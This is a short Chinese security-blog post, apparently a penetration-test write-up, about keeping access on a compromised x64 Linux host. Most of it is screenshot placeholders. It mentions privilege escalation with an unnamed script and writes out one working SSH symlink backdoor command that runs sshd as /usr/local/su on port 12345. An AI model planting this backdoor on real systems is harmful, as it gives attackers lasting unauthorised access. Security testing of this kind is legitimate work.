记一次权限维持 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

记一次权限维持

2023-11-06 16:29:52

本文由创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

1. 外网打点

1699259116_6548a2ece0c1ee1c5974a.png!small?1699259117716

1699259104_6548a2e05739166dd6645.png!small?1699259117716

1699259110_6548a2e6dd99a6f24cb51.png!small?1699259117716

1699259111_6548a2e7be06b2d93d51b.png!small?1699259117716

该系统为linux系统且为x64架构

1699259123_6548a2f385dbbebc620b1.png!small?1699259124338

1699259130_6548a2fa04c9f9990d30d.png!small?1699259130751

1699259132_6548a2fcc786405ad6b26.png!small?1699259133392

1699259137_6548a3014b306f8c41d48.png!small?1699259138349

1699259143_6548a3078ac2bb8060836.png!small?1699259144842
进行提权

利用可用脚本进行提权

1699259144_6548a308507473f772c5a.png!small?1699259144842

ssh软连接后门

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345

1699259193_6548a339f06f5c20318ea.png!small?1699259194839

测试软连接

1699259194_6548a33a209b0be43f9e4.png!small?1699259194839

# 系统安全 # 内网渗透

已在FreeBuf发表 0 篇文章

本文为独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多